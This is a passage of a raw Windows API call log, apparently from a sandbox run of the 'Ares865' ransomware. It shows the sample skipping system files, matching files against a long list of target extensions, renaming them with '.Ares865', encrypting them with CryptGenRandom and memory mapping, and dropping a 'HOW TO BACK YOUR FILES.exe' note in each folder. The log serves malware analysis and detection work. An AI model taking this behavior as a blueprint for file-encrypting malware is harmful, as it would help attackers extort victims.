ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0078.366] lstrcmpiW (lpString1="Proof.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.366] lstrcmpiW (lpString1="Proof.msi", lpString2="aoldtz.exe") returned 1 [0078.366] lstrcmpiW (lpString1="Proof.msi", lpString2=".") returned 1 [0078.366] lstrcmpiW (lpString1="Proof.msi", lpString2="..") returned 1 [0078.366] lstrcmpiW (lpString1="Proof.msi", lpString2="windows") returned -1 [0078.366] lstrcmpiW (lpString1="Proof.msi", lpString2="bootmgr") returned 1 [0078.366] lstrcmpiW (lpString1="Proof.msi", lpString2="temp") returned -1 [0078.366] lstrcmpiW (lpString1="Proof.msi", lpString2="pagefile.sys") returned 1 [0078.366] lstrcmpiW (lpString1="Proof.msi", lpString2="boot") returned 1 [0078.366] lstrcmpiW (lpString1="Proof.msi", lpString2="ids.txt") returned 1 [0078.367] lstrcmpiW (lpString1="Proof.msi", lpString2="ntuser.dat") returned 1 [0078.367] lstrcmpiW (lpString1="Proof.msi", lpString2="perflogs") returned 1 [0078.367] lstrcmpiW (lpString1="Proof.msi", lpString2="MSBuild") returned 1 [0078.367] lstrlenW (lpString="Proof.msi") returned 9 [0078.367] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0078.367] lstrcmpiW (lpString1="oof.msi", lpString2="Ares865") returned 1 [0078.367] lstrcmpiW (lpString1="Proof.msi", lpString2=".dll") returned 1 [0078.367] lstrcmpiW (lpString1="Proof.msi", lpString2=".lnk") returned 1 [0078.367] lstrcmpiW (lpString1="Proof.msi", lpString2=".ini") returned 1 [0078.367] lstrcmpiW (lpString1="Proof.msi", lpString2=".sys") returned 1 [0078.367] lstrlenW (lpString="Proof.msi") returned 9 [0078.367] lstrlenW (lpString="bak") returned 3 [0078.367] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0078.367] lstrlenW (lpString="ba_") returned 3 [0078.367] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0078.367] lstrlenW (lpString="dbb") returned 3 [0078.367] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0078.367] lstrlenW (lpString="vmdk") returned 4 [0078.367] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0078.367] lstrlenW (lpString="rar") returned 3 [0078.367] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0078.367] lstrlenW (lpString="zip") returned 3 [0078.367] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0078.367] lstrlenW (lpString="tgz") returned 3 [0078.367] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0078.367] lstrlenW (lpString="vbox") returned 4 [0078.367] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0078.368] lstrlenW (lpString="vdi") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0078.368] lstrlenW (lpString="vhd") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0078.368] lstrlenW (lpString="vhdx") returned 4 [0078.368] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0078.368] lstrlenW (lpString="avhd") returned 4 [0078.368] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0078.368] lstrlenW (lpString="db") returned 2 [0078.368] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0078.368] lstrlenW (lpString="db2") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0078.368] lstrlenW (lpString="db3") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0078.368] lstrlenW (lpString="dbf") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0078.368] lstrlenW (lpString="mdf") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0078.368] lstrlenW (lpString="mdb") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0078.368] lstrlenW (lpString="sql") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0078.368] lstrlenW (lpString="sqlite") returned 6 [0078.368] lstrcmpiW (lpString1="of.msi", lpString2="sqlite") returned -1 [0078.368] lstrlenW (lpString="sqlite3") returned 7 [0078.368] lstrcmpiW (lpString1="oof.msi", lpString2="sqlite3") returned -1 [0078.368] lstrlenW (lpString="sqlitedb") returned 8 [0078.368] lstrcmpiW (lpString1="roof.msi", lpString2="sqlitedb") returned -1 [0078.368] lstrlenW (lpString="xml") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0078.368] lstrlenW (lpString="$er") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0078.368] lstrlenW (lpString="4dd") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0078.368] lstrlenW (lpString="4dl") returned 3 [0078.368] lstrcmpiW (lpString1="msi", lpString2="4dl") returned 1 [0078.368] lstrlenW (lpString="^^^") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0078.369] lstrlenW (lpString="abs") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0078.369] lstrlenW (lpString="abx") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0078.369] lstrlenW (lpString="accdb") returned 5 [0078.369] lstrcmpiW (lpString1="f.msi", lpString2="accdb") returned 1 [0078.369] lstrlenW (lpString="accdc") returned 5 [0078.369] lstrcmpiW (lpString1="f.msi", lpString2="accdc") returned 1 [0078.369] lstrlenW (lpString="accde") returned 5 [0078.369] lstrcmpiW (lpString1="f.msi", lpString2="accde") returned 1 [0078.369] lstrlenW (lpString="accdr") returned 5 [0078.369] lstrcmpiW (lpString1="f.msi", lpString2="accdr") returned 1 [0078.369] lstrlenW (lpString="accdt") returned 5 [0078.369] lstrcmpiW (lpString1="f.msi", lpString2="accdt") returned 1 [0078.369] lstrlenW (lpString="accdw") returned 5 [0078.369] lstrcmpiW (lpString1="f.msi", lpString2="accdw") returned 1 [0078.369] lstrlenW (lpString="accft") returned 5 [0078.369] lstrcmpiW (lpString1="f.msi", lpString2="accft") returned 1 [0078.369] lstrlenW (lpString="adb") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0078.369] lstrlenW (lpString="adb") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0078.369] lstrlenW (lpString="ade") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0078.369] lstrlenW (lpString="adf") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0078.369] lstrlenW (lpString="adn") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0078.369] lstrlenW (lpString="adp") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0078.369] lstrlenW (lpString="alf") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0078.369] lstrlenW (lpString="ask") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0078.369] lstrlenW (lpString="btr") returned 3 [0078.369] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0078.370] lstrlenW (lpString="cat") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0078.370] lstrlenW (lpString="cdb") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0078.370] lstrlenW (lpString="ckp") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0078.370] lstrlenW (lpString="cma") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0078.370] lstrlenW (lpString="cpd") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0078.370] lstrlenW (lpString="dacpac") returned 6 [0078.370] lstrcmpiW (lpString1="of.msi", lpString2="dacpac") returned 1 [0078.370] lstrlenW (lpString="dad") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0078.370] lstrlenW (lpString="dadiagrams") returned 10 [0078.370] lstrlenW (lpString="daschema") returned 8 [0078.370] lstrcmpiW (lpString1="roof.msi", lpString2="daschema") returned 1 [0078.370] lstrlenW (lpString="db-journal") returned 10 [0078.370] lstrlenW (lpString="db-shm") returned 6 [0078.370] lstrcmpiW (lpString1="of.msi", lpString2="db-shm") returned 1 [0078.370] lstrlenW (lpString="db-wal") returned 6 [0078.370] lstrcmpiW (lpString1="of.msi", lpString2="db-wal") returned 1 [0078.370] lstrlenW (lpString="dbc") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0078.370] lstrlenW (lpString="dbs") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0078.370] lstrlenW (lpString="dbt") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0078.370] lstrlenW (lpString="dbv") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0078.370] lstrlenW (lpString="dbx") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0078.370] lstrlenW (lpString="dcb") returned 3 [0078.370] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0078.370] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0078.371] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0078.371] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0078.371] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0078.371] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0078.371] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="aoldtz.exe") returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2=".") returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="..") returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="windows") returned -1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="bootmgr") returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="temp") returned -1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="pagefile.sys") returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="boot") returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="ids.txt") returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="ntuser.dat") returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="perflogs") returned 1 [0078.371] lstrcmpiW (lpString1="Proof.xml", lpString2="MSBuild") returned 1 [0078.371] lstrlenW (lpString="Proof.xml") returned 9 [0078.371] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0078.372] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.Ares865") returned 89 [0078.372] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.ares865"), dwFlags=0x1) returned 1 [0078.373] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.373] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1347) returned 1 [0078.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0078.380] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f01e8) returned 1 [0078.380] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.380] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.381] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0xa4 [0078.382] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x190000 [0078.383] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f01e8) returned 1 [0078.384] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.384] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0078.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0078.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.384] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.385] CloseHandle (hObject=0xa4) returned 1 [0078.385] CloseHandle (hObject=0x118) returned 1 [0078.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0160 | out: hHeap=0x2b0000) returned 1 [0078.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.385] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0078.385] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0078.385] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2368 [0078.385] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C" [0078.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0078.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0078.385] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned 62 [0078.385] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C" [0078.385] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.385] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.390] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.390] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x603b10a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x603b10a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.390] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.390] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.390] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0078.390] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x603b10a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x603b10a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.390] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.390] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0078.390] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0078.390] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0078.390] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x603b10a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x603b10a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0078.390] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0078.390] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0078.390] lstrcmpiW (lpString1="Setup.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.390] lstrcmpiW (lpString1="Setup.xml", lpString2="aoldtz.exe") returned 1 [0078.390] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0078.390] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0078.391] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0078.391] lstrcmpiW (lpString1="Setup.xml", lpString2="bootmgr") returned 1 [0078.391] lstrcmpiW (lpString1="Setup.xml", lpString2="temp") returned -1 [0078.391] lstrcmpiW (lpString1="Setup.xml", lpString2="pagefile.sys") returned 1 [0078.391] lstrcmpiW (lpString1="Setup.xml", lpString2="boot") returned 1 [0078.391] lstrcmpiW (lpString1="Setup.xml", lpString2="ids.txt") returned 1 [0078.391] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0078.391] lstrcmpiW (lpString1="Setup.xml", lpString2="perflogs") returned 1 [0078.391] lstrcmpiW (lpString1="Setup.xml", lpString2="MSBuild") returned 1 [0078.391] lstrlenW (lpString="Setup.xml") returned 9 [0078.391] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*") returned 64 [0078.391] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.391] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.392] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.392] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2424) returned 1 [0078.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0078.392] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0160) returned 1 [0078.393] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.393] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0078.393] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc80, lpName=0x0) returned 0xa4 [0078.394] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc80) returned 0x190000 [0078.395] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0160) returned 1 [0078.396] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.396] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0078.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0078.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0078.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.396] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.396] CloseHandle (hObject=0xa4) returned 1 [0078.396] CloseHandle (hObject=0x15c) returned 1 [0078.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0078.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.397] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, 